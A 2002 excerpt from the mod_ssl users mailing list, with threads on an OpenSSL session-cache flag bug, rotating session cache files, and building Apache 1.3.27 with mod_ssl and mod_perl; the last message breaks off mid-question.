Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20021020235226.GA16638@fermat.math.technion.ac.il>
User-Agent: Mutt/1.4i
Organization: BTU Cottbus, Allgemeine Elektrotechnik
X-Virus-Scanned: by AMaViS snapshot-20011031
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Lutz Jaenicke 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Mon, Oct 21, 2002 at 01:52:26AM +0200, Nadav Har'El wrote:
> On Sun, Oct 20, 2002, Geoff Thorpe wrote about "Re: Memory leak in session caching?":
> > > Too bad we can't tell OpenSSL also not to *put* stuff in that cache,
> > 
> > Are you sure that it is storing sessions in an internal cache when that
> > flag is set?
> 
> Well, the SSL_CTX_set_session_cache_mode(3) manual says about
> SSL_SESS_CACHE_NO_INTERNAL_LOOKUP that:
> 
>    "By setting this flag sessions are cached in the internal storage but
>     they are not looked up automatically. ..."

See below.

> The relevant functions in OpenSSL are: (I looked at openssl-engine-0.9.6g)
>         SSL_CTX_add_session     (ssl/ssl_sess.c)
>         ssl_update_cache()      (ssl/ssl_lib.c)
>         ssl_get_prev_session in (ssl/ssl_sess.c)
> 
> SSL_CTX_add_session() (ssl_sess.c) is the function that actually adds a
> session to the internal cache. It always does it's job - it doesn't
> check session_cache_mode flags before doing it.
> 
> So the question is whether this function is called when the flag
> SSL_SESS_CACHE_NO_INTERNAL_LOOKUP is set.
> 
> SSL_CTX_add_session() is only called in two places in OpenSSL: in
> ssl_update_cache() (ssl_lib.c) and in ssl_get_prev_session() (ssl_sess.c).
> So now we need to check if those functions check the
> SSL_SESS_CACHE_NO_INTERNAL_LOOKUP flag or not.
> 
> ssl_update_cache() (called when OpenSSL creates a new, not resumed, session)
> indeed *appears* not to call SSL_CTX_add_session() when 
> SSL_SESS_CACHE_NO_INTERNAL_LOOKUP is on. This fits your guess, contradicts
> what the manual page says, and also seems to contradict with the experiment
> I outlined above - I can't explain it...
> 
> The second function, ssl_get_prev_session() (called to fetch a session
> with an existing id), however, calls SSL_CTX_add_session WITHOUT first
> checking the NO_INTERNAL_LOOKUP flag! So when an answer
> is fetched from the external cache, it is also cached in the internal
> cache regardless of the NO_INTERNAL_LOOKUP flag.
> 
> So to sum it up, I belive NO_INTERNAL_LOOKUP does not consistently
> prevent sessions from being entered into the cache; According to my
> experiment (which is not backed by firm understanding the source code,
> unfortunately) even in cases (new sessions) when sessions should apparently
> not be cached in the internal cache, they do end up being cached.

I will cross check your investigation.

For 0.9.6d (see CHANGES file), I commited an according change:
  *) Do not store session data into the internal session cache, if it
     is never intended to be looked up (SSL_SESS_CACHE_NO_INTERNAL_LOOKUP
     flag is set). Proposed by Aslam .
     [Lutz Jaenicke]

It however seems, that I did not only forget to update the manual page.

Best regards,
	Lutz
-- 
Lutz Jaenicke                             Lutz.Jaenicke@aet.TU-Cottbus.DE
http://www.aet.TU-Cottbus.DE/personen/jaenicke/
BTU Cottbus, Allgemeine Elektrotechnik
Universitaetsplatz 3-4, D-03044 Cottbus
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Oct 21 14:42:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA18119; Mon, 21 Oct 2002 14:41:29 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from fermat.math.technion.ac.il id OAA18106; Mon, 21 Oct 2002 14:40:29 +0200 (MET DST)
Received: from fermat.math.technion.ac.il (localhost [127.0.0.1])
	by fermat.math.technion.ac.il (8.12.1/8.12.1) with ESMTP id g9LCeQiX007700;
	Mon, 21 Oct 2002 14:40:26 +0200 (IST)
Received: (from nyh@localhost)
	by fermat.math.technion.ac.il (8.12.1/8.12.1/Submit) id g9LCeO3h007699;
	Mon, 21 Oct 2002 14:40:24 +0200 (IST)
Date: Mon, 21 Oct 2002 14:40:24 +0200
From: "Nadav Har'El" 
To: modssl-users@modssl.org
Cc: rt@openssl.org
Subject: Re: Memory leak in session caching?
Message-ID: <20021021124024.GA7163@fermat.math.technion.ac.il>
References: <20021018004158.GA9550@fermat.math.technion.ac.il> <200210172241.54084.geoff@geoffthorpe.net> <20021020104502.GA7903@fermat.math.technion.ac.il> <200210201346.48509.geoff@geoffthorpe.net> <20021020235226.GA16638@fermat.math.technion.ac.il>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20021020235226.GA16638@fermat.math.technion.ac.il>
User-Agent: Mutt/1.4i
Hebrew-Date: 15 Heshvan 5763
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Nadav Har'El" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Mon, Oct 21, 2002, Nadav Har'El wrote about "Re: Memory leak in session caching?":
> I than ran several requests (using curl, so sessions were never resumed),
> and sure enough, after 7 requests (to only one server process) I saw a
> message like
> 
> 	items in ssl->ctx->sessions: 7
>....
> indeed *appears* not to call SSL_CTX_add_session() when 
> SSL_SESS_CACHE_NO_INTERNAL_LOOKUP is on. This fits your guess, contradicts
> what the manual page says, and also seems to contradict with the experiment
> I outlined above - I can't explain it...
>...
> I'm baffled, I have to admit. It will probably take a bigger OpenSSL expert
> than me to fully understand this.

I found why my reading of the source code contradicted with my above
experiment: like an idiot, I compiled my test with Redhat's variant of
OpenSSL 0.9.6b, rather than with the OpenSSL 0.9.6g I was intending to use
and whose source code I was reading!

I ran the test again with the correct library, and OpenSSL 0.9.6g indeed
does not cache new sessions in the internal cache (when NO_INTERNAL_LOOKUP),
like I already noticed in the source code.

But it does cache resumed sessions in the internal cache, again like I
noticed in the source code (ssl_get_prev_session()) - so I think this is
the bug.

Thanks,
	Nadav

-- 
Nadav Har'El                        |     Monday, Oct 21 2002, 15 Heshvan 5763
nyh@math.technion.ac.il             |-----------------------------------------
Phone: +972-53-245868, ICQ 13349191 |As far as we know, our computer has never
http://nadav.harel.org.il           |had an undetected error.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Oct 21 21:57:29 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA01286; Mon, 21 Oct 2002 21:56:28 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from herring.crytech.com id VAA01263; Mon, 21 Oct 2002 21:56:01 +0200 (MET DST)
Received: (qmail 16794 invoked from network); 21 Oct 2002 19:56:00 -0000
Received: from unknown (HELO croaker) (216.187.147.1)
  by herring.crytech.com with SMTP; 21 Oct 2002 19:56:00 -0000
Message-ID: <06b301c2793b$812badf0$1801a8c0@croaker>
From: "Emily Eileen Witcher" 
To: 
Subject: ssl_scache.dir and ssl_scache.pag
Date: Mon, 21 Oct 2002 13:53:17 -0600
MIME-Version: 1.0
Content-Type: text/plain;
	charset="Windows-1252"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Emily Eileen Witcher" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Is it possible to "rotate" these files? I don't seem to even be able to gzip
or move them. They are getting very large and I would like to reclaim some
disk space. They are located in /usr/local/apache/logs but also symbolically
lined to /etc/httpd/logs/ - do I need to remove the link first?

Emily Witcher - emily@crytech.com


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct 22 10:33:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA21611; Tue, 22 Oct 2002 10:32:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from maggotts.rnib.org.uk id KAA21601; Tue, 22 Oct 2002 10:31:22 +0200 (MET DST)
From: John.Airey@rnib.org.uk
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.145])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id g9M8Uj613865
	for ; Tue, 22 Oct 2002 09:31:06 +0100
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Tue, 22 Oct 2002 09:30:40 +0100
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F033F2210@pborolocal.rnib.org.uk>
To: modssl-users@modssl.org
Subject: RE: ssl_scache.dir and ssl_scache.pag
Date: Tue, 22 Oct 2002 09:30:30 +0100
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Here's a script to rotate files from /usr/local/apache/logs to
/usr/local/apache/logs/archive:

#!/bin/csh
/bin/mv /usr/local/apache/logs/* /usr/local/apache/logs/archive
/etc/rc.d/init.d/httpd graceful

This will rotate all the files in that directory out without Apache dropping
a single byte. On your system you might need "apachectl reload" instead as
the above example is for a Red Hat Linux system.

- 
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

Theories of evolution are like buses - there'll be another one along in a
minute



> -----Original Message-----
> From: Emily Eileen Witcher [mailto:emily@crytech.com]
> Sent: 21 October 2002 20:53
> To: modssl-users@modssl.org
> Subject: ssl_scache.dir and ssl_scache.pag
> 
> 
> Is it possible to "rotate" these files? I don't seem to even 
> be able to gzip
> or move them. They are getting very large and I would like to 
> reclaim some
> disk space. They are located in /usr/local/apache/logs but 
> also symbolically
> lined to /etc/httpd/logs/ - do I need to remove the link first?
> 
> Emily Witcher - emily@crytech.com
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct 22 10:50:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA21922; Tue, 22 Oct 2002 10:49:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from madimc2.indra.es id KAA21916; Tue, 22 Oct 2002 10:48:44 +0200 (MET DST)
Received: from madarrclex5.indra.es ([192.168.10.22]) by madimc2.indra.es with Microsoft SMTPSVC(5.0.2195.5329);
	 Tue, 22 Oct 2002 10:40:34 +0200
Received: from madtormail2.indra.es ([172.30.100.17]) by madarrclex5.indra.es with Microsoft SMTPSVC(5.0.2195.5329);
	 Tue, 22 Oct 2002 10:46:09 +0200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Subject: RV: [users@httpd] Apache 2.0.35 spawns too many processes when using IPv6 adresses (bug?)
content-class: urn:content-classes:message
X-MimeOLE: Produced By Microsoft Exchange V6.0.6249.0
Date: Tue, 22 Oct 2002 10:46:08 +0200
Message-ID: 
Thread-Topic: Apache spawns too many processes
Thread-Index: AcJ2hWrfJdn8Rj6ZQC2Ktz5CDoMFNgDIVBtQ
X-Message-Flag: Seguimiento
From: "Garzon Maldonado, Jesus Javier" 
To: 
Cc: 
X-OriginalArrivalTime: 22 Oct 2002 08:46:09.0166 (UTC) FILETIME=[778772E0:01C279A7]
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id KAA21918
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Garzon Maldonado, Jesus Javier" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello again:

I've realized that the problem described bellow only happens when IPv6 addresses are employed, if I follow the same steps with IPv4 addresses Apache works fine.

Somebody else has tried this configuration?, 

maybe this problem was solved in later versions... does anybody know?

Thanks.

-----Mensaje original-----
De: Garzon Maldonado, Jesus Javier 
Enviado el: viernes, 18 de octubre de 2002 10:58
Para: users@httpd.apache.org
Asunto: [users@httpd] Apache spawns too many processes


Hello all:

I have running Apache 2.0.35+mod_ssl+mod_rewrite+mod_php in a FreeBSD 4.4 box.

Though the number of spare servers and threads is restricted in the httpd.conf file, when users browses across the web site the number off httpd processes running (as nobody user) grows continously consuming all the CPU time.

This doesn't happen if I launch Apache with /apachectl start.

How can I solve this problem?.

Thanks in advance.

Javi Garzon

---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See  for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   "   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct 22 11:10:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA22737; Tue, 22 Oct 2002 11:09:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from exchange-ulis.ulis.zencod.com id LAA22731; Tue, 22 Oct 2002 11:08:40 +0200 (MET DST)
Subject: SSL_engine_init  for crypto accelerator, etc ... (OpenSSL ENGINE)
Date: Tue, 22 Oct 2002 11:08:08 +0200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C279AA.8A1A4F17"
Message-ID: 
content-class: urn:content-classes:message
X-MimeOLE: Produced By Microsoft Exchange V6.0.6249.0
Thread-Topic: SSL_engine_init  for crypto accelerator, etc ... (OpenSSL ENGINE)
Thread-Index: AcJ5qooHyfBUvPdXRsqfh6FK5fdbYg==
From: "Frederic DONNAT" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Frederic DONNAT" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C279AA.8A1A4F17
Content-Type: text/plain;
	charset="Windows-1252"
Content-Transfer-Encoding: quoted-printable

Hi all,


A few month ago i submit a patch for mod-ssl for apache 1.3.x to enable =
use of  OpenSSL ENGINE random functionnality.

I also see a patch in the cvs mailing list for this a few weeks ago.  ;) =
(some subtil change)

What about apache 2.0.x ?
Should a submit a patch ?
I was thinking that apache-2.0.x was an apache 1.3.x (with some change =
of course) but with mod-ssl module in it.

Regards
Fred


------_=_NextPart_001_01C279AA.8A1A4F17
Content-Type: text/html;
	charset="Windows-1252"
Content-Transfer-Encoding: quoted-printable






SSL_engine_init  for crypto accelerator, etc ... (OpenSSL =
ENGINE)





Hi all,





A few month ago i submit a patch for mod-ssl for apache 1.3.x to enable =
use of  OpenSSL ENGINE random functionnality.



I also see a patch in the cvs mailing list for this a few weeks =
ago.  ;) (some subtil change)



What about apache 2.0.x ?

Should a submit a patch ?

I was thinking that apache-2.0.x was an apache 1.3.x (with some change =
of course) but with mod-ssl module in it.



Regards

Fred







------_=_NextPart_001_01C279AA.8A1A4F17--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct 22 23:28:22 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA15728; Tue, 22 Oct 2002 23:27:25 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from pancake.NACSE.ORG id XAA15723; Tue, 22 Oct 2002 23:26:58 +0200 (MET DST)
Received: from scimitar.NACSE.ORG (scimitar.NACSE.ORG [128.193.34.81])
	by pancake.NACSE.ORG (8.12.4/8.12.4) with SMTP id g9MLQuIa028483
	for ; Tue, 22 Oct 2002 14:26:57 -0700 (PDT)
Message-Id: <200210222126.g9MLQuIa028483@pancake.NACSE.ORG>
Date: Tue, 22 Oct 2002 14:26:56 -0700 (PDT)
From: leanne lai 
Subject: Apache_1.3.27 and ssl
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: TEXT/plain; charset=us-ascii
Content-MD5: X3rf0f4AAXnNx6Vn/v+53Q==
X-Mailer: dtmail 1.3.0 @(#)CDE Version 1.4.2 SunOS 5.8 sun4u sparc 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: leanne lai 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Dear All,

I don't know whether this is the right place for asking this question 
but I am desperate :(

I am trying to compile apache_1.3.27 and mod_ssl-2.8.11-1.3.27, 
however, apachec_1.3.27 does not seem to have "enable_module=ssl" 
option anymore in its congfigure script!!!

Help!

Thanks,
Leanne

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct 22 23:42:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA16261; Tue, 22 Oct 2002 23:41:27 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from GULFWINDSINTL.COM id XAA16241; Tue, 22 Oct 2002 23:40:02 +0200 (MET DST)
From: tgarner@gwii.com
To: modssl-users@modssl.org
Subject: Re: Apache_1.3.27 and ssl
Message-ID: 
Date: Tue, 22 Oct 2002 16:39:39 -0500
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="=_alternative 0076FACE86256C5A_="
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: tgarner@gwii.com
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multipart message in MIME format.
--=_alternative 0076FACE86256C5A_=
Content-Type: text/plain; charset="us-ascii"

Here's what we did:

####################################################################
# notes to install and configure apache with modules, mod_perl, so
####################################################################

    #   extract the packages
 
    $ gzip -d -c openssl-0.9.6a.tar.gz | tar xvf -
!!!
    ##########################
    INSTALL openssl first !!!
    ##########################
!!!

    $ gzip -d -c apache_1.3.x.tar.gz | tar xvf -
    $ gzip -d -c mod_ssl-2.8.x-1.3.x.tar.gz | tar xvf -
    $ gzip -d -c mod_perl-1.xx.tar.gz | tar xvf -

    ########################################################
    #   apply mod_ssl to Apache source tree

      cd mod_ssl*
      ./configure --with-apache=../apache_1.3.27
    ########################################################
    #   apply mod_perl to Apache source tree
    #   and build/install the Perl-side of mod_perl
 
    cd mod_perl-1.27
    perl Makefile.PL EVERYTHING=1 APACHE_SRC=../apache_1.3.27/src 
USE_APACI=1 PREP_HTTPD=1 DO_HTTPD=1
    make
    make install
    cd ../
    ########################################################

    #   build/install Apache with mod_ssl and mod_perl

    cd apache_1.3.27
    SSL_BASE=../openssl-0.9.6a ./configure --prefix=/usr/local/apache 
--enable-module=ssl --activate-module=src/modules/perl/libperl.a 
--enable-module=perl --enable-module=so
    make
    make certificate
    make install
    cd ../
    ########################################################


Troy Garner
Information Technology Manager
Gulf Winds International, Inc.
713.747.4909 x5753
www.gwii.com





leanne lai 
Sent by: owner-modssl-users@modssl.org
10/22/2002 04:26 PM
Please respond to modssl-users

 
        To:     modssl-users@modssl.org
        cc: 
        Subject:        Apache_1.3.27 and ssl


Dear All,

I don't know whether this is the right place for asking this question 
but I am desperate :(

I am trying to compile apache_1.3.27 and mod_ssl-2.8.11-1.3.27, 
however, apachec_1.3.27 does not seem to have "enable_module=ssl" 
option anymore in its congfigure script!!!

Help!

Thanks,
Leanne

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org





--=_alternative 0076FACE86256C5A_=
Content-Type: text/html; charset="us-ascii"





Here's what we did:



####################################################################

# notes to install and configure apache with modules, mod_perl, so

####################################################################



    #   extract the packages

    

    $ gzip -d -c openssl-0.9.6a.tar.gz | tar xvf -

!!!

    ##########################

    INSTALL openssl first !!!

    ##########################

!!!



    $ gzip -d -c apache_1.3.x.tar.gz | tar xvf -

    $ gzip -d -c mod_ssl-2.8.x-1.3.x.tar.gz | tar xvf -

    $ gzip -d -c mod_perl-1.xx.tar.gz | tar xvf -



    ########################################################

    #   apply mod_ssl to Apache source tree



      cd mod_ssl*

      ./configure --with-apache=../apache_1.3.27

    ########################################################

    #   apply mod_perl to Apache source tree

    #   and build/install the Perl-side of mod_perl

    

    cd mod_perl-1.27

    perl Makefile.PL EVERYTHING=1 APACHE_SRC=../apache_1.3.27/src USE_APACI=1 PREP_HTTPD=1 DO_HTTPD=1

    make

    make install

    cd ../

    ########################################################



    #   build/install Apache with mod_ssl and mod_perl



    cd apache_1.3.27

    SSL_BASE=../openssl-0.9.6a ./configure --prefix=/usr/local/apache --enable-module=ssl --activate-module=src/modules/perl/libperl.a --enable-module=perl --enable-module=so

    make

    make certificate

    make install

    cd ../

    ########################################################





Troy Garner

Information Technology Manager

Gulf Winds International, Inc.

713.747.4909 x5753

www.gwii.com













leanne lai <leanne@nacse.org>

Sent by: owner-modssl-users@modssl.org

10/22/2002 04:26 PM

Please respond to modssl-users



        

        To:        modssl-users@modssl.org

        cc:        

        Subject:        Apache_1.3.27 and ssl






Dear All,



I don't know whether this is the right place for asking this question 

but I am desperate :(



I am trying to compile apache_1.3.27 and mod_ssl-2.8.11-1.3.27, 

however, apachec_1.3.27 does not seem to have "enable_module=ssl" 

option anymore in its congfigure script!!!



Help!



Thanks,

Leanne



______________________________________________________________________

Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org

User Support Mailing List                      modssl-users@modssl.org

Automated List Manager                            majordomo@modssl.org










--=_alternative 0076FACE86256C5A_=--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct 22 23:45:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA16359; Tue, 22 Oct 2002 23:44:26 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from sbs.iplaynz.com id XAA16335; Tue, 22 Oct 2002 23:43:21 +0200 (MET DST)
Received: from drew ([192.168.0.56] RDNS failed) by sbs.iplaynz.com with Microsoft SMTPSVC(5.0.2195.4905);
	 Wed, 23 Oct 2002 10:50:01 +1300
Message-ID: <009901c27a14$08805d40$3800a8c0@drew>
From: "Drew Broadley" 
To: 
References: <200210222126.g9MLQuIa028483@pancake.NACSE.ORG>
Subject: Re: Apache_1.3.27 and ssl
Date: Wed, 23 Oct 2002 10:43:17 +1300
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
X-OriginalArrivalTime: 22 Oct 2002 21:50:01.0660 (UTC) FILETIME=[F9147FC0:01C27A14]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Drew Broadley" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi Leanne,

Have you followed the basic building instructions here?

http://www.modssl.org/example/

These have an alternative and obviously recommended method of building your
apache + ssl system.

Cheers,
Drew

----- Original Message -----
From: "leanne lai" 
To: 
Sent: Wednesday, October 23, 2002 10:26 AM
Subject: Apache_1.3.27 and ssl


>
> Dear All,
>
> I don't know whether this is the right place for asking this question
> but I am desperate :(
>
> I am trying to compile apache_1.3.27 and mod_ssl-2.8.11-1.3.27,
> however, apachec_1.3.27 does not seem to have "enable_module=ssl"
> option anymore in its congfigure script!!!
>
> Help!
>
> Thanks,
> Leanne
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 23 00:03:17 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id AAA17129; Wed, 23 Oct 2002 00:02:57 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from pancake.NACSE.ORG id AAA17009; Wed, 23 Oct 2002 00:01:07 +0200 (MET DST)
Received: from scimitar.NACSE.ORG (scimitar.NACSE.ORG [128.193.34.81])
	by pancake.NACSE.ORG (8.12.4/8.12.4) with SMTP id g9MM07Ia029628
	for ; Tue, 22 Oct 2002 15:01:05 -0700 (PDT)
Message-Id: <200210222201.g9MM07Ia029628@pancake.NACSE.ORG>
Date: Tue, 22 Oct 2002 15:01:05 -0700 (PDT)
From: leanne lai 
Subject: Re: Apache_1.3.27 and ssl
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: TEXT/plain; charset=us-ascii
Content-MD5: 4fZ8AJ7HthBDCkjded6wKQ==
X-Mailer: dtmail 1.3.0 @(#)CDE Version 1.4.2 SunOS 5.8 sun4u sparc 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: leanne lai 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Thanks Troy and Drew!!! It is working now!! Thanks for answering!!!


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 23 03:16:16 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id DAA22556; Wed, 23 Oct 2002 03:15:39 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from go4.ext.ti.com id DAA22481; Wed, 23 Oct 2002 03:14:47 +0200 (MET DST)
Received: from dlep8.itg.ti.com ([157.170.134.88])
	by go4.ext.ti.com (8.12.6/8.12.6) with ESMTP id g9N1EfuX008160
	for ; Tue, 22 Oct 2002 20:14:41 -0500 (CDT)
Received: from dlep8.itg.ti.com (localhost [127.0.0.1])
	by dlep8.itg.ti.com (8.9.3/8.9.3) with ESMTP id UAA11094
	for ; Tue, 22 Oct 2002 20:14:40 -0500 (CDT)
Received: from par.itg.ti.com (par.itg.ti.com [172.25.63.194])
	by dlep8.itg.ti.com (8.9.3/8.9.3) with ESMTP id UAA11070
	for ; Tue, 22 Oct 2002 20:14:40 -0500 (CDT)
Received: from par.itg.ti.com (localhost [127.0.0.1])
	by par.itg.ti.com (8.12.3/8.12.3) with ESMTP id g9N1EcF0012131
	(version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=OK);
	Tue, 22 Oct 2002 20:14:38 -0500 (CDT)
Received: (from keith@localhost)
	by par.itg.ti.com (8.12.3/8.12.3/Submit) id g9N1Ec6Y012128;
	Tue, 22 Oct 2002 20:14:38 -0500 (CDT)
X-Authentication-Warning: par.itg.ti.com: keith set sender to ksparacin@ti.com using -f
To: modssl-users@modssl.org
Subject: SSL reverse proxy using certificates to IIS server
From: Keith Sparacin 
Date: 22 Oct 2002 20:14:38 -0500
Message-ID: 
Lines: 82
User-Agent: Gnus/5.0807 (Gnus v5.8.7) Emacs/20.4
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Keith Sparacin 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Has anyone gotten an Apache 2.0.43 SSL reverse proxy working to an IIS
backend server requiring certificate verification on the IIS server
side?  I can reverse proxy Apache to an SSL Unix server and an SSL IIS
server (neither requiring certificates).  I can also reverse proxy
Apache to an SSL Unix server requiring certificate verification.  I
have not been able to get it working to an IIS server requiring
certificate verification.  I have verified that the Apache
certificates are valid using openssl to retrieve web pages from the
IIS server:

